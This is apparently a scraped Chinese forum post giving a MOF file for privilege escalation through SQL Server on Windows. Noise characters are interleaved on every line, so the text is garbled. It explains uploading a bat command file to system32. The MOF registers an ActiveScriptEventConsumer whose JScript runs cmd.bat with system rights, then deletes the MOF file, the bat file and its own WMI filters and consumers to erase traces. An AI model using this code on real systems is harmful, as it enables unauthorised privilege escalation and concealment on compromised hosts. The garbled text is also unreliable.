这个sql提权MOF需要运行 system下的文件,不能定义路径。
3 J% x2 R, {& l8 @" f, ?" g需要将要运行的命令写入到bat上传到system32目录,然后执行。
S- p" _8 b! K! M# f
$ B. u7 {7 e' w6 c6 I0 d" x这个sql提权MOF需要运行 system下的文件,不能定义路径。
5 |2 j2 u- v4 D+ |' l需要将要运行的命令写入到bat上传到system32目录,然后执行。) _+ e h4 `1 _9 ~7 t, t
/ h4 }" `% T6 E7 a. P1 n/ E1 I. y#pragma
% ?6 d/ Y9 V5 ^ namespace("\\\\.\\root\\cimv2")
) E; C5 B8 W5 z class
9 X w+ Y; E( s1 d MyClass547. u. E ]2 `4 L( n
{ [key]7 ^9 a) i! X, q; r( [2 t9 P
string
* c( ]# P1 g" z" b$ E' P; Q Name;
# ]2 q+ O4 x5 B5 j };
, n5 ^( K ?8 w* H" c+ j class
) M- C' E* B2 v! L: ?# x) x ActiveScriptEventConsumer7 V, N3 A! j& q( s
: __EventConsumer { [key]3 y7 t1 r7 E& K8 [, x. p/ n& q
string
6 X6 {7 K; b, Q; O! S0 V Name; [not_null]
5 V! X/ B5 D$ P. T3 F& g string
) q# [1 _; M( o+ m0 O8 P7 _- c ScriptingEngine; string
; c8 n8 s6 E2 ]% P% E; b8 S7 s ScriptFileName; [template]
, ?! h. H) t2 R# T string2 f! u' S5 K7 B* M+ \' V$ f6 H
ScriptText; uint32 KillTimeout;
2 k3 w; \: S6 X, S8 g& r) R }; instance of __Win32Provider as $P {
6 x( I0 d2 {- Q1 ?* J Name. s/ N; j1 Q1 g! d1 F! P9 G
=
: s* Y7 J L+ @4 ^; C "ActiveScriptEventConsumer"; CLSID =9 y1 S# F& n: z0 p* g3 b( g
"{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";# b4 J( v6 U$ ~' \) r
PerUserInitialization+ A) _5 c h+ U
= TRUE;
/ }, A" o! g; i' j }; instance of __EventConsumerProviderRegistration { Provider
+ i1 D( j5 ?' R- `9 i = $P; ConsumerClassNames
% z2 v* ]7 W6 w0 y3 V8 M =) W+ ^* D+ D! p, C. U' b. z! I
{"ActiveScriptEventConsumer"};5 E3 V9 H2 C7 F1 G
};
: ^0 ], M8 {0 W( X& P$ E, g5 ?' j Instance of ActiveScriptEventConsumer
3 u L) ~1 o1 {; |! j4 K' u, C as $cons { Name0 M; s9 V, t. V9 a4 ^
=
' [2 N# B0 ?! V/ Z$ E "ASEC"; ScriptingEngine" z5 N7 C* R# e/ O% g
=+ ~! r/ {" r8 w" }+ P u+ m4 o
"JScript"; ScriptText9 R4 I5 M p# L1 _- r( u+ x0 d
=
5 [: A& K% {2 M8 y* V# W9 S "\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"cmd.bat\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass547\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};"; };
& Y, a/ `0 F4 q Instance of ActiveScriptEventConsumer0 K( \" L& K' |4 d# n7 E. e
as $cons2 { Name
6 j2 g* N4 U+ [1 C5 S7 D- \ =" u; p8 m% ]; u1 h; r) R
"qndASEC"; ScriptingEngine: A# Y5 x; H) T6 W& |
=
$ [, P3 v- t0 J; a* V. I "JScript"; ScriptText2 P8 L) D9 N8 Q7 G! O2 }
=
1 N) x6 \1 ?* D' Z) [ "\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\hBsBa.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"cmd.bat\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";' O7 r0 n2 F/ V' |1 B: a1 M) G
}; instance of __EventFilter as $Filt { Name" z7 m0 R" z }- R
=
- X3 j/ T2 z7 v0 I9 ]+ W2 b, j, |: m "instfilt"; Query$ T( Y' a3 K8 F( w: Q1 w/ k
=% j% V* f8 u9 W) O8 ?8 X
"SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass547\""; QueryLanguage3 V: t% K/ h( l$ U; W) u8 f
= C( G. P+ K' z& t" L; [3 s
"WQL"; }; instance of __EventFilter as $Filt2 { Name4 N3 {9 i0 m: E4 N+ M
=8 E! @6 E8 S: Q) K
"qndfilt"; Query5 ]7 r$ Q4 e1 p* ?8 _' V- x0 O
=* c3 P `& ]3 _6 a/ }6 M$ p
"SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"cmd.bat\""; QueryLanguage
7 C3 T; P4 H2 U = B: Q8 J" L& M
"WQL"; }; instance of __FilterToConsumerBinding as $bind { Consumer& a Q9 ^$ r& Y: w6 b
= $cons; Filter
" H% S; N2 M _; X8 `" ^- M; Q" Y' I = $Filt;, J$ I4 A, U; R
}; instance of __FilterToConsumerBinding as $bind2 { Consumer
4 u2 y$ C8 _* Z4 V/ @ = $cons2; Filter( ?( b7 k- M/ r) X8 E' L5 a
= $Filt2;
0 N# \# R( O" L5 C6 | }; instance of MyClass5477 x9 }, o9 O$ C9 C- I) ~) w \- o% H
as $MyClass { Name* e n1 g. R% E1 s7 K9 w
=
& I+ i4 ~3 O4 d) w' R "ClassConsumer";
1 l3 W* Y, l, m8 @ }; |